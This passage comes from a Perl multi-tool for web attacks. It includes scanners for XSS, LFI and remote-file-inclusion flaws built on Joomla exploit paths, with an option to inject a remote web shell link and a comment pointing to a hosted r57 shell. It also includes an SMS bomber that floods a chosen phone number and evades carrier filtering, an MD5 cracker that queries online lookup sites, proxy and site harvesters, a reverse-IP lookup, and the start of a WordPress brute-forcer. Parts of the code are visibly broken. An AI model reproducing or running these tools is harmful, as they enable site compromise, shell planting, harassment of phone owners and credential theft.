607. "/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=",
608. "/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=",
609. "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=",
610. "/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=",
611. "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=",
612. "/components/com_reporter/reporter.logic.php?mosConfig_absolute_path=",
613. "/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=",
614. "/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=",
615. "/components/com_joomlaboard/file_upload.php?sbp=",
616. "/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=",
617. "/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=",
618. "/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=",
619. "/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=",
620. "/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=",
621. "/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=",
622. "/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=",
623. "/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=",
624. "/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=",
625. "/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=",
626. "/modules/mod_as_category.php?mosConfig_absolute_path=",
627. "/components/com_articles.php?absolute_path=",
628. "/classes/html/com_articles.php?absolute_path=",
629. "/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=",
630. "/templates/be2004-2/index.php?mosConfig_absolute_path=",
631. "/libraries/pcl/pcltar.php?g_pcltar_lib_dir=",
632. "/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=",
633. "/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=",
634. "/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=",
635. "/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=",
636. "/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=",
637. "/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=",
638. "/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=",
639. "/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=",
640. "/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=",
641. "/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=",
642. "/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=",
643. "/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=",
644. "/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=",
645. "/components/com_mp3_allopass/allopass.php?mosConfig_live_site=",
646. "/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=",
647. "/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=",
648. "/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=",
649. "/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=",
650. "/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=",
651. "/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=",
652. "/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=",
653. "/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=",
654. "/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=",
655. "/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=",
656. "/administrator/components/com_color/admin.color.php?mosConfig_live_site=",
657. "/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=",
658. "/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=",
659. "/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=",
660. "/index.php?option=com_adsmanager&mosConfig_absolute_path=",
661. "/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=",
662. "/com_magazine_3_0_1/magazine.functions.php?config=",
663. "/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=",
664. "/administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=",
665. "/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=");
666.  
667.  
668. ##############################
669. #XSS
670.  
671. if ($ID==1){
672.  
673. print "\n XSS:";
674. print "\n\t\t Please Enter Target [http://www.site.com/search.php?id= ";
675. print "\n\t\t Target:";
676. $Target=<STDIN>;
677. chomp ($Target);
678.  
679. foreach $XSS(@XSS){
680. my $URL = $Target.$XSS;
681. my $Source = get $URL;
682. die "Can not get $URL" unless defined $URL;
683. if ( $URL =~ /MrTieDie/ || /HAcked/ || /BHG/ || /XSS/ || /cookie/ ) { $Message ="XSS Vulnerability FOUND";}
684. else { $Message = "NOT FOUND XSS Vulnerability";}
685. print "$URL => $Message\n";
686. print "\n \n \n \n \t \t \t \t FINISH ";
687. open (TEXT, '>>XSS.txt');
688. print TEXT "\n$URL => $Message \n\n";
689. close (TEXT);
690. }
691. goto Exit;
692. }
693. ###############################
694. #LFI
695. if ($ID==2){
696.  
697. print "\n\t\t Please Enter Target [http://www.site.com/search.php?id= ";
698. print "\n\t\t Target:";
699. $Target=<STDIN>;
700. chomp ($Target);
701.  
702.  
703. foreach $LFI(@LFI){
704. my $URL = $Target.$LFI;
705. my $Source = get $URL;
706. die "Can not get $URL" unless defined $URL;
707. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
708. else { $Message = "NOT FOUND LFI Vulnerability";}
709. print "$URL => $Message\n";
710. print "\n \n \n \n \t \t \t \t FINISH ";
711. open (TEXT, '>>LFI.txt');
712. print TEXT "\n$URL => $Message \n\n";
713. close (TEXT);
714. }
715.  
716. }
717. #################################
718. if ($ID==3){
719.  
720. print "\t\tPlease Enter Target [http://www.site.com]";
721. print "\n\n \t Target:";
722. $Target=<STDIN>;
723. chomp ($Target);
724. print "\n\t\t please Enter Shell Link:"; #May Can help you : http://www.mcrracecars.co.uk/images/r57.txt
725. $Shell =<STDIN>;
726. chomp ($Shell);
727. print"\n\n \t\t Please wait";
728. sleep(2);
729. print"\n";
730.  
731. foreach $RFI(@RFI){
732. my $URL =$Target.$RFI.$Shell;
733. my $Source = get $URL;
734. die "Can not get $URL" unless defined $URL;
735. if ($Source =~ /r57shell/ || /safe_mode/ || /Executed / || /Shell/){ $Message ="RFI Vulnerability FOUND";}
736. else { $Message = "NOT FOUND RFI Vulnerability";}
737. print "\n \n \n \n \t \t \t \t FINISH ";
738. print "\n $URL => $Message \n";
739. open (TEXT, '>>RFI.txt');
740. print TEXT "\n $URL => $Message \n\n";
741. close (TEXT);
742.  
743. }
744.  
745. }
746. #################################
747. #XSS & LFI
748. if ($ID==4){
749.  
750. print "\t\tPlease Enter Target [http://www.site.com]";
751. print "\n\n \t Target:";
752. $Target=<STDIN>;
753. chomp ($Target);
754. print "\n\t\t please Enter Shell Link:"; #May Can help you : http://www.mcrracecars.co.uk/images/r57.txt
755. $Shell =<STDIN>;
756. chomp ($Shell);
757. print"\n\n \t\t Please wait";
758. sleep(2);
759. print"\n";
760.  
761.  
762. foreach $XSS(@XSS){
763. my $URL = $Target.$XSS;
764. my $Source = get $URL;
765. die "Can not get $URL" unless defined $URL;
766. if ( $URL =~ /MrTieDie/ || /HAcked/ || /BHG/ || /XSS/ || /cookie/ ) { $Message ="Vulnaravel a XSS";}
767. else { $Message = "NOT FOUND XSS Vulnerability";}
768. print "$URL => $Message\n";
769. print "\n \n \n \n \t \t \t \t FINISH ";
770. open (TEXT, '>>ALL.txt');
771. print TEXT "\n$URL => $Message \n\n";
772. close (TEXT);
773. }
774.  
775. foreach $LFI(@LFI){
776. my $URL = $Target.$LFI;
777. my $Source = get $URL;
778. die "Can not get $URL" unless defined $URL;
779. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
780. else { $Message = "NOT FOUND LFI Vulnerability";}
781. print "$URL => $Message\n";
782. print "\n \n \n \n \t \t \t \t FINISH ";
783. open (TEXT, '>>ALL.txt');
784. print TEXT "\n$URL => $Message \n\n";
785. close (TEXT);
786. if ($ID==5) {exit;}
787. Exit:
788. exit;
789. system("pause");
790. }
791. }}
792. }
793. if($targett eq '6')
794. {
795. system('cls');
796. system('title Joomla Component Scanner');
797. package control;
798. use LWP::UserAgent;
799. use LWP::Simple;
800. use strict;
801. use warnings;
802. use threads;
803. use threads::shared;
804. use Config;
805. use HTML::TreeBuilder;
806. use HTML::Element;
807.  
808.  
809.  
810. $Config{useithreads} or die('Recompile Perl with threads to run this program.'); #thread(enabled) check
811.  
812.  
813. print"**********************************************************\n";
814. print"*************************SMS BoMbEr***********************\n";
815. print"************************By: MrTieDie**********************\n";
816. print"**********************************************************\n";
817.  
818. ##getting inputs, need to get rid of whitespace and or \n character with chomp();
819. print"Enter the number you want to bomb: \n";
820. chomp(my $phoneNum = <STDIN>);
821.  
822. print "Enter your carrier (AT&T=41|Verizon=203|Sprint=176): \n";
823. chomp(my $carrier = <STDIN>);
824.  
825. print "How many messages?: \n";
826. chomp(my $amountOfMessages = <STDIN>);
827.  
828. print "Enter your email: \n";
829. chomp(my $from = <STDIN>);
830.  
831. print "Enter your subject: \n";
832. chomp(my $subject = <STDIN>);
833.  
834. print "Enter your SMS MSG: \n";
835. chomp(my $message = <STDIN>);
836.  
837. print "**********************************************************\n";
838. print "**BOMBING\n";
839. my $numOfBombsSent :shared = 0;
840. my $inc :shared = 0;
841. $inc = 10000; #incrementing variable used for carriers that sort messages by email instead of phone #
842. &main;
843.  
844. sub main{
845. while($numOfBombsSent<$amountOfMessages){
846. &checkAndBypassEmailFilter;
847. if(($amountOfMessages-$numOfBombsSent)==1){
848. &checkAndBypassEmailFilter;
849. &bomb;
850. } else {
851. my $pid = fork(); #fork splits process into two
852. if($pid){ #immediately have to handle both ($pid,0) <-child and ($pid) <- parent **parent
853. if($numOfBombsSent<$amountOfMessages){
854. &checkAndBypassEmailFilter; #has to make sure that child is done executing before it finishes. or else child will
855. &bomb; #parent #become a zombie
856. }
857. waitpid($pid, 0);
858. } elsif($pid == 0){
859. if($numOfBombsSent<$amountOfMessages){
860. &checkAndBypassEmailFilter;
861. &bomb; #child
862. }
863. } else {
864. die "Fork failed";
865. }
866. }
867. }
868. }
869.  
870. sub checkAndBypassEmailFilter{
871. if($carrier==203 or $carrier==176){ #this is for some carriers that organize based on the email function (thus not getting the full bomb effect)
872. #so this increments their email by one each time to start a new convo :D gotcha bitch
873. my @email = split('@', $from);
874. lock($inc); #locks $inc variable so nothing else can modify it until it's done with it.
875. $from = $email[0].$inc++.'@'.$email[1];
876. }
877. }
878. sub postUrl {
879. my $content =
880. my($url, $formref) = @_;
881. my $ua = new LWP::UserAgent(timeout => 300); # set up a UserAgent object to handle request
882. $ua->agent('perlproc/1.0');
883. my $response = $ua->post($url, $formref); #no need to handle the response from server.
884. if($response->is_success){
885. return $response->content;
886. } else {
887. return "POST failure";
888. }
889. }
890. sub Return_Code { #From Saustin's SMS bomber
891. my $content = $_[0];
892. my $tree = HTML::TreeBuilder->new;
893. $tree->parse($content);
894. $tree->elementify();
895.  
896. my @elements = $tree->find("INPUT"); #because they haven't heard of lowercase
897. foreach(@elements)
898. {
899. my $ele = $_;
900. if($ele->attr('NAME') eq "code")
901. {
902. return $ele->attr('value');
903. }
904. }
905. }
906.  
907. sub bomb{
908. my $url = "http://www.onlinetextmessage.com/send.php";
909. my $indexUrl = "http://www.onlinetextmessage.com/";
910. my $lwp = get $indexUrl;
911. my $code = Return_Code($lwp);
912. #print "Code: $code\n";
913. my %param = ('carrier' => $carrier, 'code' => $code, 'from' => $from, 'message' => $message, 'number' => $phoneNum,'quicktext' => '','remember' => 'y', 's' => 'Send Message','subject' => $subject);
914. &postUrl($url,\%param);
915. lock($numOfBombsSent); #locks $numOfBombsSent variable so nothing else can modify it until it's done with it.
916. $numOfBombsSent++;
917. print "Bomb Status: [",($numOfBombsSent),"/",($amountOfMessages),"]\n";
918. }}
919. if($targett eq '7')
920. {
921. system('cls');
922. system('title Proxy Grabber');
923. use strict;
924. use warnings;
925. use LWP::UserAgent;
926.  
927. my $useragent = LWP::UserAgent->new();
928. $useragent->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
929.  
930. for (my $i=1;$i<50;$i++) {
931.  
932. my $respone = $useragent->get("http://proxylist.hidemyass.com/search-226162/"."$i");
933.  
934. my @list = split (/<td><span><style>/,$respone->content);
935.  
936. foreach (@list) {
937. if ($_ =~ /<html>/) {
938. next;
939. }
940. my @flag=();
941. $_ =~ s/\n//g;
942. (my $gflag) = $_ =~ /^(.+)<\/style>/;
943. my @aflag = split (/\./, $gflag);
944.  
945. foreach my $fl (@aflag) {
946. if ((my $result) = $fl =~ /(.?.?.?.)\{display:inline\}/) {
947. push (@flag, $result);
948. }
949. }
950.  
951. my @aspan = split (/span/, $_);
952.  
953. foreach my $sspan (@aspan) {
954. foreach my $fl (@flag) {
955. if ((my $result) = $sspan =~ /class=\"$fl\">(\.[0-9]+\.|[0-9]+\.|\.[0-9]+|[0-9]+|\.)/) {
956. print $result;
957. }
958. }
959. if ((my $result) = $sspan =~ /class=\"[0-9]+\">(\.[0-9]+\.|[0-9]+\.|\.[0-9]+|[0-9]+|\.)/) {
960. print $result;
961. }
962. if ((my $result) = $sspan =~ /style=\"display: inline\">(\.[0-9]+\.|[0-9]+\.|\.[0-9]+|[0-9]+|\.)/) {
963. print $result;
964. }
965. if ((my @result) = $sspan =~ /(<\/div>|^>)(\.[0-9]+\.|[0-9]+\.|\.[0-9]+|[0-9]+|\.)/) {
966. print $result[1];
967. }
968. if ((my $result) = $sspan =~ /style>(\.[0-9]+\.|[0-9]+\.|\.[0-9]+|[0-9]+|\.)/) {
969. print $result;
970. }
971. }
972. (my $port) = $_ =~ /<td>([0-9]+?)<\/td>/;
973. print ":$port\n";
974. }
975. }}
976. if($targett eq '9')
977. {
978. system('cls');
979. system('title Jce Server Scanner');
980. my $jces;
981. use LWP::UserAgent;
982. use HTTP::Request::Common qw(GET);
983. $ag = LWP::UserAgent->new();
984. $ag->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
985. $ag->timeout(10);
986. print "[+] Jce Server Scanner \n";
987. print "[+] Coded by MrTieDie \n";
988. print "[+] Enter IP Jce ; Ex : 192.1.1.1 : \n";
989. chomp ($jces = <STDIN>);
990. chomp(my $jces = $ARGV[0]);
991. for ($jces = 1; $jces <= 10000; $i+=10){
992. $url = "http://www.bing.com/search?q=$jces$i&FORM=PERE";
993. $resp = $ag->request(HTTP::Request->new(GET => $url));
994. $rrs = $resp->content;
995.  
996. while($rrs =~ m/<a href=\"?http:\/\/(.*?)\//g){
997. $link = $1;
998. if ( $link !~ /overture|msn|live|bing|yahoo|duckduckgo|google|yahoo|microsof/){
999. if ($link !~ /^http:/){$link = 'http://' . "$link" . '/';}
1000. if($link !~ /\"|\?|\=|index\.php/){
1001. print "\n\t $link";
1002. push(@resul,$link);}} }
1003.  
1004. while($rrs =~ m/<a href=\"?http:\/\/(.*?[\/].*?)\//g){
1005. $link = $1;
1006. if ( $link !~ /overture|msn|live|bing|yahoo|duckduckgo|google|yahoo|microsof/){
1007. if ($link !~ /^http:/){$link = 'http://' . "$link" . '/';}
1008. if($link !~ /\"|\?|\=|index\.php/){
1009. print "\n\t $link";
1010. push(@resul,$link);}} }
1011.  
1012. if ($rrs !~ m/class=\"sb_pagN\"/g){
1013. $total = $#resul+1;
1014. open(TXTS,"<KkK.txt"); chomp(@ar = <TXTS>); close(TXTS); push(@resul,@ar);
1015. open (TXT,">KkK.txt");
1016. foreach(@resul){$c{$_}++;next if $c{$_} > 1;print TXT "$_\n";push(@arq,$_);}
1017. close(TXT);
1018. $arq=$#arq+1;
1019. print "\n\n Total Result $total , total in file $arq\n"; exit;
1020. }}
1021. }
1022. if($targett eq '8')
1023. {
1024. system('title Wordpress Plugin Checker');
1025. use HTTP::Request;
1026. use LWP::UserAgent;
1027. use Term::ANSIColor;
1028. if($^O eq 'MSWin32'){ system('cls'); } else { system('clear'); }
1029. print color "bold yellow";
1030. print '
1031. __ ______ ____ _ _ ____ _ _
1032. \ \ / / _ \ | _ \| |_ _ __ _(R)_ __ / ___| |__ ___ ___| | _____ _ __
1033. \ \ /\ / /| |M) | | |E) | | | | |/ _` | | _ \ | | | _ \ /__ \/ __| |/ /__ \ __|
1034. \ V V / | __/ | __/| | |_| | (D| | | | | | | |___| | | | __/ (I_| | K_/ |
1035. \_/\_/ |_| |_| |_|\__,_|\__, |_|_| |_| \____|_| |_|\___|\___|_|\_\___|_|
1036. |___/
1037. ';
1038. print color "bold red";print " Writed By : Medrik
1039.  
1040. IeDb.Ir / Acc , SecTime.Ir
1041.  
1042. Grey Hat Boys ...
1043. "; print color "reset";
1044. print "\n\n";
1045. print color "bold blue";print " [+]";print color"reset";print " input target Ex: http://www.Wordpress.com/ \n";
1046. print "\n";
1047. print "\n";
1048. print color "bold blue";print " [+]";print color"reset";print " input target please: ";
1049. chomp($s=<STDIN>);
1050. print "\n\n";
1051. print "\n";
1052.  
1053.  
1054. open(plu_file,"<Plugin_path.txt") or die "Can Not open path file\n";
1055. my @mylist =<plu_file>;
1056. close("plu_file");
1057.  
1058. foreach $LST(@mylist){
1059.  
1060. $f=$s.$LST;
1061. my $rQ=HTTP::Request->new(GET=>$f);
1062. my $User_agent=LWP::UserAgent->new();
1063. $User_agent ->agent("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)");
1064. $User_agent->timeout(30);
1065. my $R=$User_agent->request($rQ);
1066. #--------------------
1067. if ($R->content =~ m/Index of/i ||
1068. $R->content =~ m/Directory/i ||
1069. $R->content =~ m/XML/i ||
1070. $R->content =~ m/Fatal error/i ||
1071. $R->content =~ m/Forbidden/i ||
1072. $R->content =~ m/Warning/i) {
1073. print color "bold green";print "\n [+]"; print color "reset"; print " Found -> $f\n\n";
1074. open(ohh_Plugin,">>Plugins_finded.txt");
1075. print ohh_Plugin "\n$f\n";
1076. }
1077. if($answer =~ m/Error 404/i or $answer =~ m/nothing found/i){
1078. print "[NO] $f\n";
1079. }
1080. else {
1081. print "[NO] $f\n";
1082. }
1083. }}
1084. if($targett eq '10')
1085. {
1086. system('cls');
1087. system('title Md5 Cracker Online');
1088. {
1089. use LWP::UserAgent;
1090. use HTTP::Request::Common;
1091.  
1092. system('cls');
1093. system('title Online Md5 Cracker Edited By MrTieDie');
1094. print "\n\t***********************************\n";
1095. print "\t* Md5 Cracker Online *\n";
1096. print "\t* ReC0ded by MrTieDie *\n";
1097. print "\t* Edited By MrTieDie *\n";
1098. print "\t- Menu : -\n";
1099. print "\t* 1 - md5 hash *\n";
1100. print "\t* 2 - md5.txt *\n";
1101. print "\t***********************************\n";
1102.  
1103.  
1104. print "\nSubmit The Menu ~# ";
1105. $pick=<STDIN>;
1106. chop($pick);
1107.  
1108. if($pick == "1"){
1109. MD5FAIL:
1110. print "\nEnter The hash of MD5 ~# ";
1111. $hash=<STDIN>;
1112. chop($hash);
1113.  
1114.  
1115. if (length($hash)==32)
1116. {
1117. print "\n\t\n";
1118. print "\t*Md5 Cracker Online\n";
1119. print "\t*ReCoded By amiral\n";
1120. print "\t*benz | amiral\n";
1121. print "\t*SEA| team\n";
1122. print "\t\n\n";
1123. &next;
1124. } else {
1125. print "\nIt's not Md5! \n\nLook The Menu again!\n\n";
1126. goto MD5FAIL;
1127. }
1128. }
1129.  
1130.  
1131. if($pick == "2"){
1132.  
1133. print "\nPlease Submit The Hash Location ~# ";
1134. $file=<STDIN>;
1135. chop($file);
1136.  
1137. open(RES,"<","$file");
1138. @lol = <RES>;
1139. close(RES);
1140.  
1141. foreach $hash(@lol){
1142. print " \nEnter The Md5 hahs Link: $hash\n\n";
1143. &next;
1144. }
1145. $url = substr($url, $1 + 13);
1146. open (txt,">>md5.txt");
1147. print txt $1,"\n";
1148. close(txt);
1149. }
1150. sub next {
1151.  
1152. $url = "http://www.md5decryption.com/";
1153. $lwp = LWP::UserAgent->new();
1154. $lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1155. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Decrypt It!"]);
1156.  
1157. print "1 www.md5decryption.com ---- ";
1158. if ($request->content =~ /Decrypted Text: <\/b>(.*)<\/font><br\/><center>/)
1159. {
1160. print "Result : $1\n";
1161. } else {
1162. print "Result : Hash not found!\n";
1163. }
1164. $url = "http://tools.kerinci.net/?x=md5";
1165. $lwp = LWP::UserAgent->new();
1166. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1167. $request = $lwp->post($url, ["hash" => $hash, "search" => "Search"]);
1168.  
1169. print "2 www.kerinci.net ---- ";
1170. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
1171. print "Result : Hash not found!\n";
1172. } else {
1173. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
1174. print "Result : $1\n";
1175. }
1176. $url = "http://md5.rednoize.com/?q=$hash&s=md5&go.x=21&go.y=18&go=Search";
1177. $lwp = LWP::UserAgent->new();
1178. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1179. $connect = $lwp -> get($url);
1180.  
1181. print "3 www.md5.rednoize.com ---- ";
1182. if ($connect->content =~ /<div id="result" >(.*)<\/div>/)
1183. {
1184. print "Result : $1\n";
1185. } else {
1186. print "Result : Hash not found!\n";
1187. }
1188. $url = "http://www.md5online.org/md5-decrypt.html";
1189. $lwp = LWP::UserAgent->new();
1190. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1191. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Decrypt"]);
1192.  
1193. print "4 www.md5online.org ---- ";
1194. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
1195. print "Result : Hash not found!\n";
1196. } else {
1197. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
1198. print "Result : $1\n";
1199. }
1200. $url = "http://www.hashkiller.co.uk/md5-decrypter.aspx";
1201. $lwp = LWP::UserAgent->new();
1202. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1203. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Submit"]);
1204.  
1205. print "5 hashkiller.co.uk ---- ";
1206. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
1207. print "Result : Hash not found!\n";
1208. } else {
1209. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
1210. print "Result : $1\n";
1211. }
1212. $url = "https://crackstation.net";
1213. $lwp = LWP::UserAgent->new();
1214. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1215. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Crack Hashes"]);
1216.  
1217. print "6 crackstation.net ---- ";
1218. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
1219. print "Result : Hash not found!\n";
1220. } else {
1221. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
1222. print "Result : $1\n";
1223. }
1224. $url = "crackhash.com";
1225. $lwp = LWP::UserAgent->new();
1226. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1227. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Start Cracking"]);
1228.  
1229. print "7 crackhash.com ---- ";
1230. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
1231. print "Result : Hash not found!\n";
1232. } else {
1233. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
1234. print "Result : $1\n";
1235. }
1236. $url = "www.md5.net/md5-cracker/";
1237. $lwp = LWP::UserAgent->new();
1238. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1239. $request = $lwp->post($url, ["hash" => $hash, "text" => "submit"]);
1240.  
1241. print "8 www.md5.net ---- ";
1242. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
1243. print "Result : Hash not found!\n";
1244. } else {
1245. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
1246. print "Result : $1\n";
1247. }
1248. $url = "http://www.md5this.com/";
1249. $lwp = LWP::UserAgent->new();
1250. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1251. $request = $lwp->post($url, ["hash" => $hash, "option" => "com_search"]);
1252.  
1253. print "9 www.md5this.com ---- ";
1254. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
1255. print "Result : Hash not found!\n";
1256. } else {
1257. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
1258. print "Result : $1\n";
1259. }
1260. $url = "http://www.hash-cracker.com/";
1261. $lwp = LWP::UserAgent->new();
1262. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1263. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Crack!!"]);
1264.  
1265. print "10 www.hash-cracker.com ---- ";
1266. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
1267. print "Result : Hash not found!\n";
1268. } else {
1269. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
1270. print "Result : $1\n";
1271. }
1272. $url = substr($url, $1 + 13);
1273. open (txt,">>md5.txt");
1274. print txt $1,"\n";
1275. close(txt);
1276. }}
1277. }
1278. if($targett eq '17')
1279. {
1280. system('cls');
1281. system('title Reverse IP');
1282. {
1283. use HTTP::Request;
1284. use LWP::UserAgent;
1285. if($^O =~ /Win/){
1286.  
1287. system("cls");
1288. system("color a");
1289. system("title Reverse D0main YougetSignal By 1337");
1290.  
1291. }else{
1292.  
1293. system("clear");
1294. }
1295. print q{
1296.  
1297. *-------------------------------*
1298. | reverse ******
1299. | YouGetSignal ****
1300. | result in log.txt ***
1301. *---------------------*
1302. };
1303. print "\n[*]Use Proxy ? (y/n):";
1304. my $chose = <>;
1305. chomp($chose);
1306.  
1307. if(lc($chose) eq 'y') {
1308. sleep (3);
1309. print "\n\n [+]Put Proxy (ex: 127.0.0.1:80) :";
1310. my $proxy = <>;
1311. chomp($proxy);
1312. print "\n\n[*]Put Host or IP (host without http://) :";
1313. my $host = <>;
1314. chomp($host);
1315. my $file = "log.txt";
1316. $ua = LWP::UserAgent->new;
1317. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
1318. $ua->proxy('http', 'http://'.$proxy.'');
1319. my $zz = $ua->post('http://domains.yougetsignal.com/domains.php',
1320. {
1321. remoteAddress => $host,
1322. }
1323. );
1324.  
1325. my $resulta = $zz->content;
1326. while ($resulta =~ m/\[([^\]]*)\]/g)
1327. {
1328. $zeb = $1;
1329. $zeb =~ m/\"(.*?)\", \"?\"/g;
1330. open(a, ">>log.txt");
1331. print a "http://$1/\n";
1332. close(a);
1333. }
1334. if($resulta =~ /\"domainCount\":\"(.*?)\"/) {
1335. sleep(2);
1336. print "\n [*]Total website Recolted: $1\n";
1337. }
1338. if($resulta =~ /\"remoteIpAddress\":\"(.*?)\"/) {
1339. sleep(1);
1340.  
1341. print "\n [*]IP serveur: $1\n";
1342. }
1343. print "\n[+]All website Reversed.\n";
1344. }
1345. if(lc($chose) eq 'n') {
1346.  
1347. print "\nPut Host or IP (host without http://) :";
1348. my $host = <>;
1349. chomp($host);
1350. my $file = "log.txt";
1351. my $ua = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5');
1352. my $zz = $ua->post('http://domains.yougetsignal.com/domains.php',
1353. {
1354. remoteAddress => $host,
1355. }
1356. );
1357.  
1358. my $resulta = $zz->content;
1359. while ($resulta =~ m/\[([^\]]*)\]/g)
1360. {
1361. $zeb = $1;
1362. $zeb =~ m/\"(.*?)\", \"?\"/g;
1363. open(a, ">>log.txt");
1364. print a "http://$1/\n";
1365. close(a);
1366. }
1367. if($resulta =~ /\"domainCount\":\"(.*?)\"/) {
1368. sleep(2);
1369. print "\n [*]Total website Recolted: $1\n";
1370. }
1371. if($resulta =~ /\"remoteIpAddress\":\"(.*?)\"/) {
1372. sleep(1);
1373.  
1374. print "\n [*]IP serveur: $1\n";
1375. }
1376. print "\n[+]All website Reversed.\n";
1377. }}
1378. }
1379. if($targett eq '14')
1380. {
1381. system('cls');
1382. system('title Wordpres BruteForce');
1383. {
1384. use LWP::UserAgent;
1385. use HTTP::Request;
